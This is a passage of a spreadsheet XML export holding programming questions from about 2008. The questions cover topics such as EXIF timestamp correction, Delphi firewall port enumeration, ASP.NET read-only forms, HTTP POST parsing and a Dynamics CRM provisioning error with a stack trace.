&lt;p&gt;Basically, if doing a dev build use this properties file, if doing a test build use this other properties file, and if doing a production build use yet a third properties file.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the easiest way to adjust EXIF timestamps on photos from multiple cameras in Windows Vista?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Scenario:&lt;/strong&gt;  Several people go on holiday together, armed with digital cameras, and snap away. Some people remembered to adjust their camera clocks to local time, some left them at their home time, some left them at local time of the country they were born in, and some left their cameras on factory time.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The Problem:&lt;/strong&gt; Timestamps in the EXIF metadata of photos will not be synchronised, making it difficult to aggregate all the photos into one combined collection.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The Question:&lt;/strong&gt; Assuming that you have discovered the deltas between all of the camera clocks, What is the &lt;em&gt;simplest&lt;/em&gt; way to correct these timestamp differences in Windows Vista?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are there any good Continuous Testing plugins for Eclipse out right now?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've used the &lt;a href="http://groups.csail.mit.edu/pag/continuoustesting/"&gt;MIT Continuous testing&lt;/a&gt; plugin in the past, but it has long since passed out of date and is no longer compatible with anything approaching a modern release of Eclipse. &lt;/p&gt;
&lt;p&gt;Does anyone have a good replacement? Free, naturally, is preferred. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you set up an API key system for your website?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let say that I have a website with some information that could be access externally. Those information need to be only change by the respected client. Example: Google Analytic or WordPress API key. How can I create a system that work like that (no matter the programming language)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to create a security architecture?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm designing a portal's security architecture. The site has pages, videos, pictures, users, databases, file system objects, etc. What is the best way to control access to all of these objects? How would you store permissions? Is a 64-bit database variable enough for storing permissions? &lt;/p&gt;
&lt;p&gt;E.g. Windows employs &lt;a href="http://en.wikipedia.org/wiki/Access_control_list" rel="nofollow"&gt;ACLs&lt;/a&gt; and &lt;a href="http://en.wikipedia.org/wiki/Security_Identifier" rel="nofollow"&gt;SIDs&lt;/a&gt;. Do you have a more up-to-date solution? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>In Delphi, How do I get an enumerator from LocalPolicy.CurrentProfile.GloballyOpenPorts in the Firewall API</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am writing some code to see if there is a hole in the firewall exception list for &lt;strong&gt;WinXP&lt;/strong&gt; and &lt;strong&gt;Vista&lt;/strong&gt; for a specific port used by our client software. &lt;/p&gt;
&lt;p&gt;I can see that I can use the &lt;code&gt;NetFwMgr.LocalPolicy.CurrentProfile.GloballyOpenPorts&lt;/code&gt; to get a list of the current Open port exceptions.  But i can not figure out how to get that enumerated list in to something that I can use in my Delphi program. &lt;/p&gt;
&lt;p&gt;My latest try is listed below. It's giving me an access violation when I use &lt;code&gt;port_list.Item&lt;/code&gt;. I know that's wrong, it was mostly wishful thinking on my part. Any help would be appreciated.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function TFirewallUtility.IsPortInExceptionList(iPortNumber: integer): boolean;
var
  i, h: integer;
  port_list, port: OleVariant;
begin
  Result := False;
  port_list := mxFirewallManager.LocalPolicy.CurrentProfile.GloballyOpenPorts;
  for i := 0 to port_list.Count - 1 do
  begin
    port := port_list.Item[i];
    if (port.PortNumber = iPortNumber) then
    begin
      Result := True;
      break;
    end;
  end;
end;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to convert all controls on an aspx webform to a read-only equivalent</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has anyone ever written a function that can convert all of the controls on an aspx page into a read only version?  For example, if UserDetails.aspx is used to edit and save a users information, if someone with inappropriate permissions enter the page, I would like to render it as read-only.  So, most controls would be converted to labels, loaded with the corresponding data from the editable original control.&lt;/p&gt;
&lt;p&gt;I think it would likely be a fairly simple routine, ie:  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dim ctlParent As Control = Me.txtTest.Parent  
Dim ctlOLD As TextBox = Me.txtTest  
Dim ctlNEW As Label = New Label  
ctlNEW.Width = ctlOLD.Width  
ctlNEW.Text = ctlOLD.Text  
ctlParent.Controls.Remove(ctlOLD)  
ctlParent.Controls.Add(ctlNEW)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;...is really all you need for a textbox --&gt; label conversion, but I was hoping someone might know of an existing function out there as there are likely a few pitfalls here and there with certain controls and situations.&lt;/p&gt;
&lt;p&gt;Update:&lt;br /&gt;
- Just setting the ReadOnly property to true is not a viable solution, as it looks dumb having things greyed out like that.
- Avoiding manually creating a secondary view is the entire point of this, so using an ingenious way to display a read only version of the user interface that was built by hand using labels is wat I am trying to avoid.&lt;/p&gt;
&lt;p&gt;Thanks!!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What to put in a session variable</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I recently came across a ASP 1.1 web application that put a whole heap of stuff in the session variable - including all the DB data objects and even the DB connection object. It ends up being huge. When the web session times out (four hours after the user has finished using the application) sometimes their database transactions get rolled back. I'm assuming this is because the DB connection is not being closed properly when IIS kills the session.&lt;/p&gt;
&lt;p&gt;Anyway, my question is what should be in the session variable? Clearly some things need to be in there. The user selects which plan they want to edit on the main screen, so the plan id goes into the session variable. Is it better to try and reduce the load on the DB by storing all the details about the user (and their manager etc.) and the plan they are editing in the session variable or should I try to minimise the stuff in the session variable and query the DB for everything I need in the Page_Load event?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Redraw screen in terminal</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do some programs edit whats being displayed on the terminal (to pick a random example, the program 'sl')? I'm thinking of the Linux terminal here, it may happen in other OS's too, I don't know.  I've always thought once some text was displayed, it stayed there. How do you change it without redrawing the entire screen? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Compiling mxml files with ant and flex sdk</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am just getting started with flex and am using the SDK (not Flex Builder). I was wondering what's the best way to compile a mxml file from an ant build script. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Absolute Minimum Requirements for Good Software Design</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to write a spec for a software application. The application takes inputs from static files (configuration data), files that it obtained by ftp, and "live" data obtained via a TCP socket. It does some stuff and generates output data, which is delivered to somebody else via a TCP socket.&lt;/p&gt;
&lt;p&gt;It is not so difficult to write a spec describing what the system should do when nothing goes wrong and even describing what it should do when certain things go wrong.&lt;/p&gt;
&lt;p&gt;But recent experience has told me that it might be a good idea to include explicitly what some people might call "no-brainers". Like keep the user-configurable data separate from the software, so when an upgrade is installed, it doesn't clobber the user data. Or have user-configurable levels of error logging. Things like that.&lt;/p&gt;
&lt;p&gt;Does anyone have a list of basic requirements that they would want &lt;em&gt;any&lt;/em&gt; system to have and that &lt;em&gt;any&lt;/em&gt; decent software developer would do more or less automatically?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Fighting with Protected Mode in Vista</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Our application commonly used an ActiveX control to download and install our client on IE (XP and prior), however as our user base has drifted towards more Vista boxes with "Protected Mode" on, we are required to investigate.&lt;/p&gt;
&lt;p&gt;So going forward, is it worth the headache of trying to use the protected mode API?  Is this going to result in a deluge of dialog boxes and admin rights to do the things our app needs to do (write to some local file places, access some other applications, etc)?&lt;/p&gt;
&lt;p&gt;I'm half bent on just adding a non-browser based installer app that will do the dirty work of downloading and installing the client, if need be... this would only need to be installed once and in large corporate structures it could be pushed out by IT.&lt;/p&gt;
&lt;p&gt;Are there some other ideas I'm missing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Python ReportLab use of splitfirst/splitlast</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to use Python with ReportLab 2.2 to create a PDF report.&lt;br /&gt;
According to the &lt;a href="http://www.reportlab.com/docs/userguide.pdf"&gt;user guide&lt;/a&gt;,&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Special TableStyle Indeces [sic]&lt;/p&gt;
  &lt;p&gt;In any style command the first row index may be set to one of the special strings 'splitlast' or 'splitfirst' to indicate that the style should be used only for the last row of a split table, or the first row of a continuation. This allows splitting tables with nicer effects around the split.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I've tried using several style elements, including:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;('TEXTCOLOR', (0, 'splitfirst'), (1, 'splitfirst'), colors.black) 
('TEXTCOLOR', (0, 'splitfirst'), (1, 0), colors.black) 
('TEXTCOLOR', (0, 'splitfirst'), (1, -1), colors.black)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and none of these seems to work.  The first generates a TypeError with the message: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;TypeError: cannot concatenate 'str' and 'int' objects
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and the latter two generate TypeErrors with the message:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;TypeError: an integer is required
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is this functionality simply broken or am I doing something wrong?  If the latter, what am I doing wrong?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Locked SQL Server Data Files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an SQL Server database where I have the data and log files stored on an external USB drive.  I switch the external drive between my main development machine in my office and my laptop when not in my office.  I am trying to use sp_detach_db and sp_attach_db when moving between desktop and laptop machines.  I find that this works OK on the desktop - I can detach and reattach the database there no problems.  But on the laptop I cannot reattach the database (the database was actually originally created on the laptop and the first detach happened there).  When I try to reattach on the laptop I get the following error:&lt;/p&gt;
&lt;p&gt;Unable to open the physical file "p:\SQLData\AppManager.mdf". Operating system error 5: "5(error not found)"&lt;/p&gt;
&lt;p&gt;I find a lot of references to this error all stating that it is a permissions issue.  So I went down this path and made sure that the SQL Server service account has appropriate permissions.  I have also created a new database on this same path and been able to succesfully detach and reattach it.  So I am confident permissions is not the issue.&lt;/p&gt;
&lt;p&gt;Further investigation reveals that I cannot rename, copy or move the data files as Windows thinks they are locked - even when the SQL Server service is stopped.  Process Explorer does not show up any process locking the files.  &lt;/p&gt;
&lt;p&gt;How can I find out what is locking the files and unlock them.&lt;/p&gt;
&lt;p&gt;I have verified that the databases do not show up in SSMS - so SQL Server does not still think they exist.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update 18/09/2008&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I have tried all of the suggested answers to date with no success.  However trying these suggestions has helped to clarify the situation.  I can verify the following:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;I can successfully detach and reattach the database only when the external drive is attached to the server that a copy of the database is restored to - effectively the server where the database is "created" - lets call this the "Source Server".  &lt;/li&gt;
&lt;li&gt;I can move, copy or rename the data and log files, after detaching the database, while the external drive is still attached to the Source Server.  &lt;/li&gt;
&lt;li&gt;As soon as I move the external drive to another machine the data and log files are "locked", although the 2 tools that I have tried - Process Explorer and Unlocker, both find no locking handles attached to the files. &lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;NB.  After detaching the database I tried both stopping the SQL Server service and shutting down the Source Server prior to moving the external drive - still with no success.&lt;/p&gt;
&lt;p&gt;So at this stage all that I can do to move data between desktop and laptop is to make a backup of the data onto the external drive, move the external drive, restore the data from the backup.  Works OK but takes a bit more time as the database is a reasonable size (1gb).  Anyway this is the only choice I have at this stage even though I was trying to avoid having to go down this path.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which JavaScript library is recommended for neat UI effects?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need a JavaScript library that supports Ajax as well as help me in making simple and neat animation effects &lt;a href="http://www.voidy.com/" rel="nofollow"&gt;in a website&lt;/a&gt; I am working on.&lt;/p&gt;
&lt;p&gt;Which library do you recommend?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Similar thing to RJS (used in Ruby on Rails) in the Java web app world?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Ruby on Rails, there's RJS templates that help do AJAX by returning javascript code that will be executed in the client browser. How can I do a similar thing in the Java/J2EE world? Is Google Widget Toolkit similar to RJS? What options do I have? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>KVM and Linux wireless bridging?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using KVM to run a Windows virtual machine on my Linux box. Networking is accomplished through a tap device, hooked into a bridged Ethernet device, which allows the Windows VM to basically appear like a separate physical computer on my network. This is pretty nice.&lt;/p&gt;
&lt;p&gt;However, my understanding is that most, if not all, wireless drivers can't support bridging. I'd really like to be able to roam a little more freely while I'm working -- does anyone know of an effective workaround?&lt;/p&gt;
&lt;p&gt;User-mode networking won't work, as I have to use some Windows VPN software that wants lower-level networking access.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Publishing vs Copying</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the difference between publishing a website with visual studio and just copying the files over to the server?  Is the only difference that the publish files are pre-compiled?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to check for memory leaks in Guile extension modules?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I develop an extension module for Guile, written in C.  This extension module embeds a Python interpreter.&lt;/p&gt;
&lt;p&gt;Since this extension module invokes the Python interpreter, I need to verify that it properly manages the memory occupied by Python objects.  &lt;/p&gt;
&lt;p&gt;I found that the Python interpreter is well-behaved in its own memory handling, so that by running valgrind I can find memory leaks due to bugs in my own Python interpreter embedding code, if there are no other interfering factors.  &lt;/p&gt;
&lt;p&gt;However, when I run Guile under valgrind, valgrind reports memory leaks.  Such memory leaks obscure any memory leaks due to my own code.  &lt;/p&gt;
&lt;p&gt;The question is what can I do to separate memory leaks due to bugs in my code from memory leaks reported by valgrind as due to Guile.  Another tool instead of valgrind?  Special valgrind options?  Give up and rely upon manual code walkthrough?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best C++ IDE for *nix</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best C++ IDE for a *nix envirnoment? I have heard the C/C++ module of Eclipse is decent as well as Notepad++ but beyond these two I have no real idea. Any thoughts or comments?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What open source virtual private server program do you recommend with windows as host</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking to have 4 Virtual servers(various linux flavors) running on a Windows server 2003 R2 64 bit edition server located at a datacenter.  I can also purchase a 2008 server or 32 bit 2k3 if needed.  They would each have their own ip address for networking so that they could be publicly accessed.  I do not know much about VPS software but have worked with it before.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I prevent deformation when rotating about the line-of-sight in OpenGL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've drawn an ellipse in the XZ plane, and set my perspective slightly up on the Y-axis and back on the Z, looking at the center of ellipse from a 45-degree angle, using gluPerspective() to set my viewing frustrum.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.flickr.com/photos/rampion/2863703051/" rel="nofollow" title="ellipse by rampion, on Flickr"&gt;&lt;img src="http://farm4.static.flickr.com/3153/2863703051_a768ed86a9_m.jpg" width="240" height="187" alt="ellipse" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Unrotated, the major axis of the ellipse spans the width of my viewport.  When I rotate 90-degrees about my line-of-sight, the major axis of the ellipse now spans the height of my viewport, thus deforming the ellipse (in this case, making it appear less eccentric).&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.flickr.com/photos/rampion/2863703073/" rel="nofollow" title="rotated ellipse by rampion, on Flickr"&gt;&lt;img src="http://farm4.static.flickr.com/3187/2863703073_24c6549d4b_m.jpg" width="240" height="187" alt="rotated ellipse" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;What do I need to do to prevent this deformation (or at least account for it), so rotation about the line-of-sight preserves the perceived major axis of the ellipse (in this case, causing it to go beyond the viewport)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>linux uptime history</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I get a history of uptimes for my debian box? After a reboot, I dont see an option for the uptime command to print a history of uptimes. If it matters, I would like to use these uptimes for graphing a page in php to show my webservers uptime lengths between boots.&lt;/p&gt;
&lt;p&gt;Update: 
Not sure if it is based on a length of time or if last gets reset on reboot but I only get the most recent boot timestamp with the last command. last -x also does not return any further info.  Sounds like a script is my best bet.&lt;/p&gt;
&lt;p&gt;Update:
Uptimed is the information I am looking for, not sure how to grep that info in code. Managing my own script for a db sounds like the best fit for an application.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Parsing HTTP Headers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've had a new found interest in building a small, efficient web server in C and have had some trouble parsing POST methods from the HTTP Header. Would anyone have any advice as to how to handle retrieving the name/value pairs from the "posted" data?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;POST /test HTTP/1.1
Host: test-domain.com:7017
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://test-domain.com:7017/index.html
Cookie: __utma=43166241.217413299.1220726314.1221171690.1221200181.16; __utmz=43166241.1220726314.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
field1=asfd&amp;amp;field2=a3f3f3
// ^-this
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I see no tangible way to retrieve the bottom line as a whole and ensure that it works every time. I'm not a fan of hard-coding in anything.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you design data models for Bigtable/Datastore (GAE)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Since the Google App Engine Datastore is based on &lt;a href="http://research.google.com/archive/bigtable.html"&gt;Bigtable&lt;/a&gt; and we know that's not a relational database, how do you design a &lt;strong&gt;&lt;em&gt;database schema&lt;/em&gt;/*data model*&lt;/strong&gt; for applications that use this type of database system?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ActiveRecord#save_only_valid_attributes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a variation on the #save method that will only save 
attributes that do not have errors attached to them. 
So a model can be updated without being valid overall, and this will 
still prevent saving invalid data to the database.&lt;/p&gt;
&lt;p&gt;By "valid attributes", I mean those attributes that give nil when calling @model_instance.errors.on(:attribute)&lt;/p&gt;
&lt;p&gt;Anyone have an idea of how to accomplish this?&lt;/p&gt;
&lt;p&gt;So far, I have the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def save_valid_attributes 
 valid? 
 update_atrtibutes attributes.inject({}){|k, v, m| m[k] = v unless errors_on(k.to_sym); m} 
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This works if there's no processing done on assignment, which in my case there is.
For example, I have a database column "start_date", and two methods defined:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def nice_start_date=(startdate)
 self.start_date = Chronic.parse(startdate) || startdate
end
def nice_start_date
 self.start_date.to_s
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;These two methods allow me to properly parse the user inputted dates using Chronic before saving. So, second way of doing this, one attribute at a time:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def save_valid_attributes(attrib) 
  valid?
  attrib.each{|(k,v)| send("${k}=", v); save; reload)
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The model needs to be reloaded each time since, if one of the dates is invalid and doesn't save, it will prevent all further attributes from saving.&lt;/p&gt;
&lt;p&gt;Is there a better way to do this? I'm sure this isn't an uncommon problem in the Rails world, I just can't seem to find anything in the Google universe of knowledge.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to Truncate a string in PHP to the word closest to a certain number of characters?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a code snippet written in PHP that pulls a block of text from a database and sends it out to a widget on a webpage.  The original block of text can be a lengthy article or a short sentence or two; but for this widget I can't display more than, say, 200 characters.  I could use substr() to chop off the text at 200 chars, but the result would be cutting off in the middle of words-- what I really want is to chop the text at the end of the last &lt;i&gt;word&lt;/i&gt; before 200 chars.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Cruise Control .Net vs Team Foundation Build</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Our team is setting up nightly and continuous integration builds.  We own Team Foundation Server and could use Team Foundation Build.  I'm more familiar with CC.Net and lean that way but management sees all the money spent on TFS and wants to use it.&lt;/p&gt;
&lt;p&gt;Some things I like better about CC.Net is the flexibility of notifications as well as the ease of implementing custom scripts.&lt;/p&gt;
&lt;p&gt;If you have experience with both products, which do you prefer and why?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What does COINIT_SPEED_OVER_MEMORY do?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When calling &lt;code&gt;CoInitializeEx&lt;/code&gt;, you can specify the following values for &lt;code&gt;dwCoInit&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;typedef enum tagCOINIT {
    COINIT_MULTITHREADED     = 0x0,
    COINIT_APARTMENTTHREADED = 0x2,
    COINIT_DISABLE_OLE1DDE   = 0x4,
    COINIT_SPEED_OVER_MEMORY = 0x8,
} COINIT;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What does the suggestively titled "speed over memory" value do? Is it ignored these days in COM?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Poppler programming</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Poppler is a classic example of something without documentation that you would prefer be documented. This question is language agnostic, just asking about the general idea..
In short, how do you make a PDF viewer control with poppler?&lt;br /&gt;
From what I can tell, you'd need to use poppler to render it to some surface, which sounds good up until you ask yourself how the user would select text and such. Does poppler offer a window for its various bindings, or do you have to code it all yourself?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Reparenting a Window as a Tab in a GTK Notebook</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using Mono with GTK# and am trying to display an existing window as a new tab in a GTK.Notebook.  I'm currently re-parenting the widget to the notebook as follows:&lt;/p&gt;
&lt;pre&gt;
MyWindow myWindow = new MyWindow();
myWindow.Children[0].Reparent(myNotebook)
&lt;/pre&gt;
&lt;p&gt;Should I be doing this, or is there a better way to re-use an existing window so that you can display it on a tab?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Performance of an large directory structure, networked application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to find out what the performance of a large directory structure would be if deep directories were to be accessed on a shared, nfs filesystem. The structure would be excessively large, with 4 levels of nested directories, each level containing 1024 directories. (1024 at root, 1024 in a given subdirectory, and so on).&lt;/p&gt;
&lt;p&gt;This filesystem would be on a network repository that users would be accessing for their personal information. The data would be replicated on multiple servers and load-balanced, but still, each machine would have a decent load at all times.&lt;/p&gt;
&lt;p&gt;If the 4th level contained the information that the users were looking for, how bad would the performance be? If all were accessing different subdirectories? Could this be resolved by caching inode information, or no? &lt;/p&gt;
&lt;p&gt;I've been searching on this for a while, but I'm primarily finding information on large files rather than large directory structures. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Provisioning Issue using CrmDeploymentService</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i've been working on Provision of an organization for quite a few days , and had faced  few issues which i was successful in resolving them.Let me explain abt the issues i faced, the MSCrmServices is a process that is running under the Network Service.
When I call the 'Execute' method on the service from a console application
all actions preformed run under the context of the 'Network Service' account.
The Network Service account has not enough rights to create an organization
so many problems occur during the action.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Registry access not allowed.&lt;/li&gt;
&lt;li&gt;Not the correct SQL Server rights&lt;/li&gt;
&lt;li&gt;Not enough AD rights.&lt;/li&gt;
&lt;li&gt;...&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Impersonation doesn't work, the service uses the process account to perform
the actions.  The only thing that works is to run the CRMAppPool identity as
an administrator which has the deployment administrator rights (added through
the Deployment manager tool).
 But this issues in CRM deployment doesnt seem to faceoff from me :(. now that i have a new issue after changing the Pool identity to the system administrator, the deployment service gives an error saying Unauthorized!!!! and further when i check the log it says..&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Process: w3wp |Organization:00000000-0000-0000-0000-000000000000
  |Thread:    1 |Category: Exception |User:
  00000000-0000-0000-0000-000000000000 |Level: Error |
  CrmException..ctor&lt;/p&gt;
  &lt;p&gt;at CrmException..ctor(String message, Exception innerException, Int32
  errorCode, Boolean isFlowControlException, Boolean enableTrace)&lt;/p&gt;
  &lt;p&gt;at CrmException..ctor(String message, Int32 errorCode)&lt;/p&gt;
  &lt;p&gt;at CrmObjectNotFoundException..ctor(BusinessEntityMoniker moniker)&lt;/p&gt;
  &lt;p&gt;at
  BusinessProcessObject.DoRetrievePublishableSingle(BusinessEntityMoniker
  moniker, EntityExpression entityExpression, Boolean
  includeUnpublished, ExecutionContext context)&lt;/p&gt;
  &lt;p&gt;at BusinessProcessObject.RetrieveUnpublished(BusinessEntityMoniker
  moniker, EntityExpression entityExpression, ExecutionContext context)&lt;/p&gt;
  &lt;p&gt;at OrganizationUIService.RetrieveUnpublished(BusinessEntityMoniker
  moniker, EntityExpression entityExpression, ExecutionContext context)&lt;/p&gt;
  &lt;p&gt;at OrganizationUIService.RetrieveOldFormXml(BusinessEntityMoniker
  moniker, ExecutionContext context)&lt;/p&gt;
  &lt;p&gt;at OrganizationUIService.ExtractAndSaveFormLabels(IBusinessEntity
  entity, ExecutionContext context)&lt;/p&gt;
  &lt;p&gt;at OrganizationUIService.Create(IBusinessEntity entity,
  ExecutionContext context)&lt;/p&gt;
  &lt;p&gt;at ImportFormXmlHandler.createOrgUI(OrganizationUIService
  orgUIService, XmlNode formNode)&lt;/p&gt;
  &lt;p&gt;at ImportFormXmlHandler.ImportItem()&lt;/p&gt;
  &lt;p&gt;at ImportHandler.Import()&lt;/p&gt;
  &lt;p&gt;at ImportHandler.Import()&lt;/p&gt;
  &lt;p&gt;at RootImportHandler.RunImport()&lt;/p&gt;
  &lt;p&gt;at ImportXml.RunImport()&lt;/p&gt;
  &lt;p&gt;at NewOrgUtility.OrganizationImportDefaultData(Guid organizationId,
  Version existingDatabaseVersion, String importFile)&lt;/p&gt;
  &lt;p&gt;at NewOrgUtility.OrganizationImportDefaultData(Guid organizationId,
  String importFile)&lt;/p&gt;
  &lt;p&gt;at NewOrgUtility.ConfigureOrganization(String organizationId, String
  organizationName, String userAccountName, String userFirstName, String
  userLastName, String userEmail, String languageCode, String
  privilegedUserGroup, String sqlAccessGroup, String userGroup, String
  reportingGroup, String privilegedReportingGroup, Boolean
  grantNetworkServiceAccess, Boolean autoGroupManagement, String
  importFileLocation, Boolean sqmOption)&lt;/p&gt;
  &lt;p&gt;at CreateOrganizationInstaller.Create(Guid organizationId, String
  organizationUniqueName, String organizationFriendlyName, String
  baseCurrencyCode, String baseCurrencyName, String baseCurrencySymbol,
  String initialUserDomainName, String initialUserFirstName, String
  initialUserLastName, String sqlServerName, Uri reportServerUrl, String
  privilegedUserGroupName, String sqlAccessGroupName, String
  userGroupName, String reportingGroupName, String
  privilegedReportingGroupName, String applicationPath, String
  languageId, Boolean sqmOption, String organizationCollation,
  MultipleTenancy multipleTenancy)&lt;/p&gt;
  &lt;p&gt;at CreateOrganizationInstaller.Create(ICreateOrganizationInfo
  organizationInfo)&lt;/p&gt;
  &lt;p&gt;at OrganizationService.Create(DeploymentEntity entity)&lt;/p&gt;
  &lt;p&gt;at CreateRequest.Process()&lt;/p&gt;
  &lt;p&gt;at CrmDeploymentService.Execute(DeploymentServiceRequest request)&lt;/p&gt;
  &lt;p&gt;at RuntimeMethodHandle._InvokeMethodFast(Object target, Object[]
  arguments, SignatureStruct&amp;amp; sig, MethodAttributes methodAttributes,
  RuntimeTypeHandle typeOwner)&lt;/p&gt;
  &lt;p&gt;at RuntimeMethodHandle.InvokeMethodFast(Object target, Object[]
  arguments, Signature sig, MethodAttributes methodAttributes,
  RuntimeTypeHandle typeOwner)&lt;/p&gt;
  &lt;p&gt;at RuntimeMethodInfo.Invoke(Object obj, BindingFlags invokeAttr,
  Binder binder, Object[] parameters, CultureInfo culture, Boolean
  skipVisibilityChecks)&lt;/p&gt;
  &lt;p&gt;at RuntimeMethodInfo.Invoke(Object obj, BindingFlags invokeAttr,
  Binder binder, Object[] parameters, CultureInfo culture)&lt;/p&gt;
  &lt;p&gt;at LogicalMethodInfo.Invoke(Object target, Object[] values)&lt;/p&gt;
  &lt;p&gt;at WebServiceHandler.Invoke()&lt;/p&gt;
  &lt;p&gt;at WebServiceHandler.CoreProcessRequest()&lt;/p&gt;
  &lt;p&gt;at SyncSessionlessHandler.ProcessRequest(HttpContext context)&lt;/p&gt;
  &lt;p&gt;at
  CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()&lt;/p&gt;
  &lt;p&gt;at HttpApplication.ExecuteStep(IExecutionStep step, Boolean&amp;amp;
